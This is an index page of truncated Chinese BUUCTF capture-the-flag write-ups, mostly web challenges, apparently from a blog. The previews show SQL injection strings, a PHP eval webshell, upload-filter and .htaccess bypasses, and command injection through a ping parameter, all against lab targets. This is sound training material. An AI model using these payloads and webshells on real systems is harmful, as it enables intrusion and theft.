BUUCTF
Y1Daa
这个作者很懒,什么都没留下…
展开
-
BUUCTF WEB [安洵杯 2019]easy_web
BUUCTF WEB [安洵杯 2019]easy_web题目链接BUUCTF在线评测题目源码i-SOON_CTF_2019/Web/easy_web at master · D0g3-Lab/i-SOON_CTF_2019解题思路进入环境后F12查看网页源代码<html><head></head><body><img src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAKgAAA原创 2022-05-02 19:58:46 · 721 阅读 · 0 评论 -
BUUCTF WEB [BJDCTF2020]Mark loves cat
BUUCTF WEB [BJDCTF2020]Mark loves cat在源码中没有发现漏洞点,使用dirsearch扫描,发现.gti泄露使用scrabble./scrabble http://70f9aaf8-036c-44f0-b1f1-df263f120cfa.node4.buuoj.cn:81/得到flag.php和index.php文件flag.php<?php$flag = file_get_contents('/flag');index.php&原创 2022-04-28 15:31:53 · 606 阅读 · 0 评论 -
BUUCTF WEB [BSidesCF 2020]Had a bad day
BUUCTF WEB [BSidesCF 2020]Had a bad dayindex.php?category=woofers'报错Warning: include(woofers'.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37Warning: include(): Failed opening 'woofers'.php' for inclusi原创 2022-04-28 10:15:41 · 574 阅读 · 0 评论 -
BUUCTF WEB [GWCTF 2019]我有一个数据库
BUUCTF WEB [GWCTF 2019]我有一个数据库刷新后查看响应包<!DOCTYPE html><html><head> <title>空的数据库</title></head><body> <h1>我有一个数据库,但里面什么也没有~</h1> <h1>不信你找</h1></body></html>没有什么其他原创 2022-04-27 00:20:33 · 347 阅读 · 0 评论 -
BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb
BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb进入环境,发现调用了date()函数,抓包后发现POST传参存在名为func,值为date的变量尝试修改func变量func=echo&p=Y-m-d+h%3Ai%3As+a回显Warning : call_user_func() expects parameter 1 to be a valid callback, function 'echo' not found or invalid function nam原创 2022-04-27 00:19:30 · 326 阅读 · 0 评论 -
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此进入环境后得到源码<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,原创 2022-04-22 17:57:00 · 1726 阅读 · 0 评论 -
BUUCTF WEB [GXYCTF2019]禁止套娃
BUUCTF WEB [GXYCTF2019]禁止套娃没有任何提示,使用dirsearch扫描# Dirsearch started Fri Apr 22 02:23:09 2022 as: ./dirsearch.py -u http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/ --delay=0.5 -t 3301 185B http://ffd94bba-98ea-4150-9103-09306827d709原创 2022-04-22 16:26:35 · 1487 阅读 · 0 评论 -
BUUCTF WEB [BJDCTF2020]The mystery of ip
BUUCTF WEB [BJDCTF2020]The mystery of ip在hint.php中找到一句注释<!-- Do you know why i know your ip? -->在flag.php中看到自己的ip,联想到X-Forwarded-For。使用Hackbar添加一个HTTP头X-Forwarded-For: 127.0.0.1回显为Your IP is : 127.0.0.1 说明我们获得了可控变量尝试命令注入失败,到这里就没什么思路原创 2022-04-22 14:18:03 · 3560 阅读 · 0 评论 -
BUUCTF WEB [BUUCTF 2018]Online Tool
BUUCTF WEB [BUUCTF 2018]Online Tool进入环境,得到一段代码<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])) { highlight_file(__FILE__);} else { $host = $_原创 2022-04-22 13:43:12 · 1493 阅读 · 0 评论 -
BUUCTF WEB [RoarCTF 2019]Easy Java
BUUCTF WEB [RoarCTF 2019]Easy Java进入环境后尝试万能密码登录、SQL注入,无效果点击help跳转,url为/Download?filename=help.docx回显为java.io.FileNotFoundException:{help.docx}使用伪协议下载help.docx文件失败,尝试使用POST下载下载成功后打开Are you sure the flag is here? ? ?发现没有任何提示尝试下载其他文件,题原创 2022-04-21 18:16:12 · 233 阅读 · 0 评论 -
BUUCTF WEB [GXYCTF2019]BabyUpload
BUUCTF WEB [GXYCTF2019]BabyUpload查看题目源码<?phpsession_start();echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Upload</title><form action=\"\" method=\"post\" enctype=\"multipart/form-dat原创 2022-04-20 16:18:14 · 412 阅读 · 0 评论 -
BUUCTF WEB [网鼎杯 2018]Fakebook
BUUCTF WEB [网鼎杯 2018]Fakebook进入环境,尝试各种功能,没能发现漏洞点,使用dirsearch扫描200 0B http://0fa8f160-8480-4f08-8eeb-df4cacc76aaa.node4.buuoj.cn:81/db.php200 0B http://0fa8f160-8480-4f08-8eeb-df4cacc76aaa.node4.buuoj.cn:81/error.php200 0B http://0f原创 2022-04-20 15:50:19 · 448 阅读 · 2 评论 -
[CISCN2019 华北赛区 Day2 Web1]Hack World
BUUCTF WEB [CISCN2019 华北赛区 Day2 Web1]Hack World提交1成功,提交字母a报错,猜测查询语句查询的是整数,外部无包裹尝试后发现空格被过滤,但select未被过滤,直接查询id=;select(flag)from(flag);回显bool(false)题目提示flag是uuid,尝试使用布尔盲注来猜测字符串的长度与每一位的字母uuid, Universally Unique Identifier,是一个长度为32位的随机字符串原创 2022-04-18 22:35:40 · 244 阅读 · 0 评论 -
BUUCTF WEB [GYCTF2020]Blacklist
BUUCTF WEB [GYCTF2020]Blacklist提交1',报错error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1发现注入点尝试union注入/?inject=1' union select 1,2原创 2022-04-18 20:29:32 · 224 阅读 · 0 评论 -
BUUCTF WEB [GXYCTF2019]BabySQli
BUUCTF WEB [GXYCTF2019]BabySQli手工注入这里需要利用sqli的一个特性:在联合查询并不存在的数据时,联合查询会构造一个虚拟的数据假设联合查询前表结构如下idnamepassword1tom123456此时执行联合查询select * from 'users' where name='admin' union select 2,'admin','123';表结构将会变成idnamepassword1原创 2022-04-18 17:37:09 · 724 阅读 · 0 评论 -
BUUCTF WEB [网鼎杯 2020 青龙组]AreUSerialz
BUUCTF WEB [网鼎杯 2020 青龙组]AreUSerialz访问环境,得到源码<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $原创 2022-04-18 10:46:29 · 136 阅读 · 0 评论 -
BUUCTF WEB [MRCTF2020]Ez_bypass
BUUCTF WEB [MRCTF2020]Ez_bypass进入环境,提示I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&a原创 2022-04-18 10:19:14 · 413 阅读 · 0 评论 -
BUUCTF WEB [MRCTF2020]你传你*呢
BUUCTF WEB [MRCTF2020]你传你🐎呢解法有些类似[SUCTF 2019]CheckIn尝试上传各种php文件后缀均被过滤,尝试上传.htaccess文件将png文件当做php文件执行AddType application/x-httpd-php .png上传后抓包,将Content-Type修改为image/pngPOST /upload.php HTTP/1.1Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buu原创 2022-04-18 10:05:54 · 252 阅读 · 0 评论 -
BUUCTF WEB [SUCTF 2019]CheckIn
BUUCTF WEB [SUCTF 2019]CheckIn.user.ini文件PHP 支持基于每个目录的 INI 文件配置。除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。与php.ini不同,.user.ini是一个能被动态加载的ini文件,它实际上是一个可以由用户自定义原创 2022-04-17 22:08:12 · 289 阅读 · 0 评论 -
BUUCTF WEB [极客大挑战 2019]HardSQL
BUUCTF WEB [极客大挑战 2019]HardSQL万能密码、union联合注入等关键词and、union等均被过滤,尝试报错注入爆破库名1'or(extractvalue(1,concat(1,database())))#XPATH syntax error: 'geek'爆破表名1'or(extractvalue(1,concat(1,(select(table_name)from(information_schema.tables)where(table_schema原创 2022-04-17 21:17:49 · 549 阅读 · 0 评论 -
BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei
BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei源码index.php<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".fil原创 2022-04-17 20:38:09 · 188 阅读 · 0 评论 -
BUUCTF WEB [BJDCTF2020]Easy MD5
BUUCTF WEB [BJDCTF2020]Easy MD5源代码leveldo.php<?phpheader('hint:select * from \'admin\' where password='.'md5($pass,true)');?><!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <meta http-equiv=原创 2022-04-17 17:49:58 · 165 阅读 · 0 评论 -
BUUCTF WEB [HCTF 2018]admin
BUUCTF WEB [HCTF 2018]admin解法1弱口令登录admin123得到flagflag{195df147-fa34-4359-b475-94f71265d085}解法2F12查看网页源代码,在change页面发现一段注释<!-- https://github.com/woadsl1234/hctf_flask/ -->下载源代码分析,改网站由flask模板搭建,尝试SSTI模板注入。查看路由信息[email protected]('原创 2022-04-17 17:26:37 · 790 阅读 · 0 评论 -
BUUCTF WEB [极客大挑战 2019]BuyFlag
BUUCTF WEB [极客大挑战 2019]BuyFlag进入环境后在MENU中发现PAYFLAG功能,点击进入,提示FLAGFLAG NEED YOUR 100000000 MONEYATTENTIONIf you want to buy the FLAG:You must be a student from CUIT!!!You must be answer the correct password!!!Only Cuit's students can buy the FLA原创 2022-04-17 15:59:07 · 550 阅读 · 0 评论 -
BUUCTF WEB [护网杯 2018]easy_tornado
BUUCTF WEB [护网杯 2018]easy_tornado进入环境,发现三个文件/flag.txtflag in /fllllllllllllag/welcome.txtrender/hints.txtmd5(cookie_secret+md5(filename))根据题目提示可知,题目环境使用python tornado模板渲染搭建,flag文件名为fllllllllllllag。观察URL可知,访问文件需要提交文件名filename和利用cooki原创 2022-04-17 15:27:44 · 629 阅读 · 0 评论 -
BUUCTF WEB [ACTF2020 新生赛]BackupFile
BUUCTF WEB [ACTF2020 新生赛]BackupFile使用dirsearch扫描后台文件,发现 index.php.bak下载后直接打开<?phpinclude_once "flag.php";if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);原创 2022-04-17 15:27:11 · 374 阅读 · 0 评论 -
BUUCTF WEB [极客大挑战 2019]PHP
BUUCTF WEB [极客大挑战 2019]PHP题目提示网站存在备份,使用御剑扫描目录,发现备份文件http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip下载后解压,得到index.php、class.php、flag.php等文件。index.php(部分代码)<?phpinclude 'class.php';$select = $_GET['select'];$res=unser原创 2022-04-16 20:33:29 · 938 阅读 · 0 评论 -
BUUCTF WEB [RoarCTF 2019]Easy Calc
BUUCTF WEB [RoarCTF 2019]Easy CalcF12查看页面源代码<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>简单的计算器</title> <meta name="viewport" content="width=device原创 2022-04-16 20:32:47 · 331 阅读 · 0 评论 -
BUUCTF WEB [极客大挑战 2019]BabySQL
BUUCTF WEB [极客大挑战 2019]BabySQL进入环境后尝试万能密码登录失败,尝试常规sql注入check.php?username=1&password=2' union select 1,2,3;#回显You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use n原创 2022-04-16 20:31:55 · 125 阅读 · 0 评论 -
BUUCTF WEB [ACTF2020 新生赛]Upload
BUUCTF WEB [ACTF2020 新生赛]Upload生成一句话木马shell.png,内容为<?php @eval($_POST['shell']);?>上传后抓包,将文件名改为shell.phtmlPOST / HTTP/1.1Host: d75f0dc8-3e8d-4e83-8af8-8972c71f8057.node4.buuoj.cn:81Content-Length: 315Cache-Control: max-age=0Upgrade-Insec原创 2022-04-16 20:31:25 · 273 阅读 · 0 评论 -
BUUCTF WEB [极客大挑战 2019]Upload
BUUCTF WEB [极客大挑战 2019]Upload尝试提交一句话木马shell.php<?php @eval($_POST['shell']);?>回显为NOT!php!说明需要修改文件后缀修改文件后缀为.phtml后尝试提交,回显为NO! HACKER! your file included '<?'说明不能包含<?,尝试绕过过滤将文件内容修改为<script language="php">eval($_POST['she原创 2022-04-16 20:30:58 · 447 阅读 · 0 评论 -
BUUCTF WEB[极客大挑战 2019]Http
BUUCTF WEB[极客大挑战 2019]Http打开环境后F12查看源代码,发现一个跳转链接<a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a>尝试访问Secret.php,提示It doesn't come from 'https://Sycsecret.buuoj.cn'抓包,修改http请求头原请求包GET /Secre原创 2022-04-16 20:30:09 · 217 阅读 · 0 评论 -
BUUCTF WEB [极客大挑战 2019]Knife
BUUCTF WEB [极客大挑战 2019]Knife根据提示直接使用蚁剑连接在文件根目录中找到flag文件,获得flagflag{b297ceda-a835-48bb-acf9-2a6c03f68d32}原创 2022-04-16 20:29:47 · 208 阅读 · 0 评论 -
BUUCTF WEB [极客大挑战 2019]LoveSQL
BUUCTF WEB [极客大挑战 2019]LoveSQL进入靶机后尝试万能密码登录admin123' or '1'='1获得flagLogin Success!Hello admin!Your password is 'c5d37b949a4f2c5f002aa623826c209f'原创 2022-04-16 20:28:36 · 130 阅读 · 0 评论 -
BUUCTF Reverse SimpleRev
BUUCTF Reverse SimpleRev导入IDA,F5查看伪代码mainint __cdecl __noreturn main(int argc, const char **argv, const char **envp){ int v3; // eax char v4; // [rsp+Fh] [rbp-1h] while ( 1 ) { while ( 1 ) { printf("Welcome to CTF game!\nPleas原创 2022-04-11 19:20:10 · 146 阅读 · 0 评论 -
BUUCTF Reverse 不一样的flag
BUUCTF Reverse 不一样的flag伪代码分析int __cdecl __noreturn main(int argc, const char **argv, const char **envp){ char v3[29]; // [esp+17h] [ebp-35h] BYREF int v4; // [esp+34h] [ebp-18h] int v5; // [esp+38h] [ebp-14h] BYREF int i; // [esp+3Ch] [ebp-10h]原创 2022-04-10 23:54:33 · 392 阅读 · 1 评论 -
BUUCTF WEB [GXYCTF2019]Ping Ping Ping
BUUCTF WEB [GXYCTF2019]Ping Ping Ping进入题目后根据提示提交?ip=127.0.0.1尝试回显PING 127.0.0.1 (127.0.0.1): 56 data bytes判断存在命令执行漏洞,尝试提交?ip=127.0.0.1;ls回显PING 127.0.0.1 (127.0.0.1): 56 data bytesflag.phpindex.php尝试访问index.php?ip=127.0.0.1;cat index.php回显f原创 2022-04-10 11:54:21 · 1464 阅读 · 0 评论 -
BUUCTF WEB [极客大挑战 2019]Secret File
BUUCTF WEB [极客大挑战 2019]Secret File启动后效果如下F12查看源代码<!DOCTYPE html><html><style type="text/css" >#master { position:absolute; left:44%; bottom:0; text-align :center; } p,h1 { curso原创 2022-04-09 12:00:40 · 1811 阅读 · 1 评论 -
BUUCTF [SUCTF 2019]EasySQL
这道题很诡异,我到现在还没有弄明白,在这里插个眼以便以后了解。首先进入环境,F12查看源代码,并没有什么可以利用的东西。尝试提交1根据题目名称猜测存在SQL注入,尝试提交1',无回显,说明存在SQL注入,但报错被关闭。尝试1' or 1=1#,返回Nonono。后续发现or被过滤。尝试order by猜解列数,发现order by也被过滤。后续尝试发现union也被过滤。尝试堆叠注入,1;show tables;# ,出现一个名为Flag的表。尝试查询Fl..原创 2022-03-10 09:28:34 · 4129 阅读 · 0 评论 -
BUUCTF [强网杯 2019]随便注
打开环境后尝试直接提交,效果如下:根据题目名称猜测存在SQL注入,尝试提交1'其中,回显报错为error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1分析后可知当前语句用单引号包裹,接下来猜解列数。1...原创 2022-03-04 23:15:31 · 3908 阅读 · 0 评论